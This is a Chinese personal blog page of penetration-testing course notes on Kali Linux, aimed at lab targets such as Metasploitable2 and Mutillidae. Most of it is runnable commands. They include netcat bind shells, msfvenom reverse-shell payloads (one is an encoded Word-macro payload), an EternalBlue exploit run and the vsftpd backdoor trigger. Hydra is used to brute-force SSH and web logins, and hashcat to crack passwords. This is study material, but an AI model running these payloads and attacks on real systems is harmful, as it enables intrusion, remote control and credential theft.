<!doctype html>
<html lang="zh-han">
  <head>
    <title>Kali渗透 // 小田博客</title>
    <link rel="shortcut icon" href="/favicon.ico" />
    <meta charset="utf-8" />
    <meta name="generator" content="Hugo 0.68.3" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="author" content="John Doe" />
    <meta name="description" content="" />
    <link rel="stylesheet" href="https://tian_828.gitee.io/css/main.min.4a7ec8660f9a44b08c4da97c5f2e31b1192df1d4d0322e65c0dbbc6ecb1b863f.css" />

    
    <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Kali渗透"/>
<meta name="twitter:description" content="lesson1 kali安装 安装vm-tools sudo apt install open-vm-tools-desktop fuse
deb安装 #install deb pkg sudo dpkg -i xxx.deb # fix install dep sudo apt install -f lesson2 扫描 被动扫描 maltego 注册及子域名扫描 1.register 邮箱注册地址: https://www.maltego.com/ce-registration/
2.subdomain扫描：建立domain block -&gt; 选择 level scan
nmap 初级使用 nsloopup baidu.com dig baidu.com # 查询备案信息 whois baidu.com 主动扫描 nmap # 批量主机发现 nmap -sn 192.168.3.1/24 # windows 机器发现 sudo nmap -O --osscan-guess -sF 192.168.3.1/24 | grep &#39;Running: Microsoft Windows&#39; | wc -l metasploitable2安装和web服务扫描 1."/>

    <meta property="og:title" content="Kali渗透" />
<meta property="og:description" content="lesson1 kali安装 安装vm-tools sudo apt install open-vm-tools-desktop fuse
deb安装 #install deb pkg sudo dpkg -i xxx.deb # fix install dep sudo apt install -f lesson2 扫描 被动扫描 maltego 注册及子域名扫描 1.register 邮箱注册地址: https://www.maltego.com/ce-registration/
2.subdomain扫描：建立domain block -&gt; 选择 level scan
nmap 初级使用 nsloopup baidu.com dig baidu.com # 查询备案信息 whois baidu.com 主动扫描 nmap # 批量主机发现 nmap -sn 192.168.3.1/24 # windows 机器发现 sudo nmap -O --osscan-guess -sF 192.168.3.1/24 | grep &#39;Running: Microsoft Windows&#39; | wc -l metasploitable2安装和web服务扫描 1." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://tian_828.gitee.io/post/kali%E6%B8%97%E9%80%8F/" />
<meta property="article:published_time" content="2021-05-19T17:13:39+08:00" />
<meta property="article:modified_time" content="2021-05-19T17:13:39+08:00" />


  </head>
  <body>
    <header class="app-header">
      <a href="https://tian_828.gitee.io/"><img class="app-header-avatar" src="/avatar.jpg" alt="John Doe" /></a>
      <h1>小田博客</h1>
      <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc vehicula turpis sit amet elit pretium.</p>
    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <h1 class ="post-title">Kali渗透</h1>
      <div class="post-meta">
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-calendar">
  <title>calendar</title>
  <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line>
</svg>
          May 19, 2021
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-clock">
  <title>clock</title>
  <circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline>
</svg>
          3 min read
        </div>
      </div>
    </header>
    <div class="post-content">
      <h1 id="lesson1-kali安装">lesson1 kali安装</h1>
<h2 id="安装vm-tools">安装vm-tools</h2>
<p>sudo apt install open-vm-tools-desktop fuse</p>
<h2 id="deb安装">deb安装</h2>
<pre><code>#install deb pkg
sudo dpkg -i xxx.deb

# fix install dep
sudo apt install -f
</code></pre><h1 id="lesson2-扫描">lesson2 扫描</h1>
<h2 id="被动扫描">被动扫描</h2>
<h3 id="maltego-注册及子域名扫描">maltego 注册及子域名扫描</h3>
<p>1.register 邮箱注册地址: <a href="https://www.maltego.com/ce-registration/">https://www.maltego.com/ce-registration/</a></p>
<p>2.subdomain扫描：建立domain block -&gt; 选择 level scan</p>
<h3 id="nmap-初级使用">nmap 初级使用</h3>
<pre><code>nsloopup baidu.com
dig baidu.com

# 查询备案信息
whois baidu.com
</code></pre><h2 id="主动扫描">主动扫描</h2>
<h3 id="nmap">nmap</h3>
<pre><code># 批量主机发现
nmap -sn 192.168.3.1/24

# windows 机器发现
sudo nmap -O --osscan-guess -sF 192.168.3.1/24 | grep 'Running: Microsoft Windows' | wc -l
</code></pre><h3 id="metasploitable2安装和web服务扫描">metasploitable2安装和web服务扫描</h3>
<p>1.两台vm同时开启桥接模式
2.默认登录: msfadmin</p>
<pre><code>dirb 192.168.3.29
</code></pre><h1 id="lesson3-shell">lesson3 shell</h1>
<h2 id="ssh">ssh</h2>
<pre><code>passwd

sudo vim /etc/ssh/sshd_config # Password permit

sudo /etc/init.d/ssh start

netstat -natp

sudo update-rc.d ssh enable
</code></pre><h2 id="sougou-input">sougou input</h2>
<pre><code>sudo dpkg sougou.deb

sudo apt intall -f

# 配置 fcitx
</code></pre><h2 id="gnome">gnome</h2>
<pre><code>sudo apt -y install kali-desktop-gnome
</code></pre><h2 id="nc">nc</h2>
<pre><code># 服务端
nc -l -p 5000
ip addr show
nc x.x.x.x 5000 # 客户端
nc -Lp 5000 -vv -e cmd.exe # windows端
nc -l -p 5000 -vv -c /bin/sh # kali 端
# 远程关机
poweroff # 远程关机
</code></pre><h1 id="lesson4">lesson4</h1>
<h2 id="remote-contorl">remote contorl</h2>
<pre><code>sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=KALI_IP lport=5000 -f exe -o /home/kali/file.exe
msfconsole
use exploit
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.3.29
set lport 5000
exploit
</code></pre><h2 id="exploit-渗透测试">exploit 渗透测试</h2>
<h3 id="永恒之蓝">永恒之蓝</h3>
<pre><code>msfconsole
search ms17_010 #搜索蓝漏洞编码ms17-010
use 2 #选择2（漏洞）
show options
set RHOSTS 192.168.3.29
# 执行渗透, exploit 是主控端监听
run
</code></pre><h2 id="vsftpd和word-macro">vsftpd和word macro</h2>
<pre><code># 扫描目标 metasploitable 2 服务 是否存在此漏洞
nmap --script ftp-vsftpd-backdoor 192.168.3.29

# 触发笑脸
ftp 192.168.3.29

# 利用并登录
nc 192.168.3.29 6200
</code></pre><pre><code>msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.3.52 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe 
&gt; wd
code wd
</code></pre><div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-py" data-lang="py"><span style="color:#f92672">import</span> socket
<span style="color:#f92672">from</span> ftplib <span style="color:#f92672">import</span> FTP

host <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;192.168.3.68&#34;</span>
ftp <span style="color:#f92672">=</span> FTP()
username <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;hello:)&#34;</span>
passwd <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;123&#34;</span>
<span style="color:#66d9ef">try</span>:
    ftp<span style="color:#f92672">.</span>connect(host, <span style="color:#ae81ff">21</span>, timeout<span style="color:#f92672">=</span><span style="color:#ae81ff">2</span>)
    ftp<span style="color:#f92672">.</span>login(username, passwd)
<span style="color:#66d9ef">except</span>:
    <span style="color:#66d9ef">print</span>(<span style="color:#e6db74">&#34;inject done.&#34;</span>)

</code></pre></div><h2 id="word-macro-msf">word macro msf</h2>
<pre><code>msfconsole # 启动 msf
use exploit # 选主控端
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.3.xx
set lport 4444                # 设置配置
msf6 exploit(multi/handler) 
run                           # 开始监听
</code></pre><h1 id="lesson5爆破">lesson5爆破</h1>
<pre><code>ssh kali

netstat -natp  #查看本机开启的端口

sudo /etc/init.d/ssh start #启动ssh服务

ssh kali

ssh kali@127.0.1.1

who #查看哪些用户登录本机

cat /usr/share/wordlists/dirb/small.txt #查看字典库

vim small.txt

cp small.txt ~/worklists #(~指主目录) 复制字典库

cd workspace

code small.txt

hydra -l kali -P small.txt ssh://kali -t 4 -v #使用爆破工具hydra
</code></pre><h1 id="lesson6-ssh-协议hydrassh-教程">lesson6 ssh 协议&amp;hydra&amp;ssh 教程</h1>
<pre><code>sudo /etc/init.d/ssh start # 开启 ssh 服务
ssh kali  #测试是否开启成功, 首次链接需要点击 yes
ssh kali@127.0.0.1  #根据提示输入密码
sudo  su
useradd  newuser    #添加账户
passwd newuser   #设置密码
touch small.txt
cat usr/share/wordlist/dirb/small.txt  #查看字典库
echo &quot;kali&quot; &gt;&gt; small.txt # 使用字典
cp usr/share/wordlist/dirb/small.txt   small.txt  #拷贝字典库
hydra -l kali -P small.txt ssh://kali -t 4 -v  # 使用爆破工具hydra
hydra -l msfadmin -P small.txt ssh://172.16.1.103:3022 -t 8 -v -f  # msf  host
# linux change pwd
sudo su
useradd ace
passwd ace # input passwd =&gt; 123 for test
hydra -l ace -x 3:3:1 ssh ssh://172.16.1.103:3022 -t 8 -v -f -I  #ssh://kali   ssh方式连接，kali这里可以为IP地址，代表要破解的主机
hydra -x -h
</code></pre><h2 id="hydra--burp-suit">hydra &amp; burp suit</h2>
<h3 id="start-mutillidae-server">start mutillidae server</h3>
<pre><code>sudo vim /var/www/mutillidae/config.inc
</code></pre><pre><code>1.analyse http request
POST /mutillidae/index.php?page=login.php HTTP/1.1
2. construct curl http request
curl -H &quot;Content-Type:application/x-www-form-urlencoded&quot; -X POST -d 'username=admin&amp;password=123456&amp;login-php-submit-button=Login' 172.16.1.103:3080/mutillidae/index.php?page=login.php
3. hydra attack
hydra 172.16.1.103:3080 -l admin -P test.txt http-post-form &quot;/mutillidae/index.php?page=login.php:username=^USER^&amp;password=^PASS^&amp;login-php-submit-button=Login:F=Not Logged In&quot;
</code></pre><h1 id="lesson7-hashcat">lesson7 HashCat</h1>
<h2 id="连接termius">连接Termius</h2>
<pre><code>1.sudo systemctl enable ssh --now  #在虚拟机中打开ssh服务
2.在客户端打开Termius
3.输入虚拟机的IP地址和用户、密码，点击connect via ssh
4.连接完成，运行rip扫描程序
</code></pre><h2 id="hashcat密码破解">HashCat密码破解</h2>
<h3 id="hashcat常用命令百度搜索内容">hashcat常用命令(百度搜索内容)</h3>
<pre><code>-m  #指定哈希类型

-a  #指定破解模式

-V  #查看版本信息

-o  #将输出结果储存到指定文件

--force    #忽略警告

--show     #仅显示破解的hash密码和对应的明文

--remove   #从源文件中删除破解成功的hash

--username #忽略hash表中的用户名

-b   #测试计算机破解速度和相关硬件信息

-O   #限制密码长度

-T   #设置线程数

-r   #使用规则文件

-1   #自定义字符集  -1 0123asd  

-2   #自定义字符集  -2 0123asd

-3   #自定义字符集  -3 0123asd 

-i   #启用增量破解模式

--increment-min   #设置密码最小长度

--increment-max   #设置密码最大长度
</code></pre><h3 id="hashcat破解模式介绍百度搜索内容">hashcat破解模式介绍(百度搜索内容)</h3>
<pre><code>
0    straight   #字典破解

1    combination  #将字典中密码进行组合（1 2&gt;11 22 12 21）

3    brute-force  #使用指定掩码破解

6    Hybrid Wordlist + Mask  #字典+掩码破解

7    Hybrid Mask  + Wordlist #掩码+字典破解
</code></pre><h3 id="hashcat集成的字符集百度搜索内容">hashcat集成的字符集(百度搜索内容)</h3>
<pre><code>?l    #代表小写字母

?u    #代表大写字母

?d    #代表数字

?s    #代表特殊字符

?a    #代表大小写字母、数字以及特殊字符  
</code></pre><pre><code>hashcat -m 1000 -a 0 win.txt &quot;hashnum&quot; wd.txt
hashcat  -a 6  1844156d4166d94387f1a4ad031ca5fa  password.txt  ?d?d?d --force  #字典&amp;掩码破解
</code></pre>
    </div>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
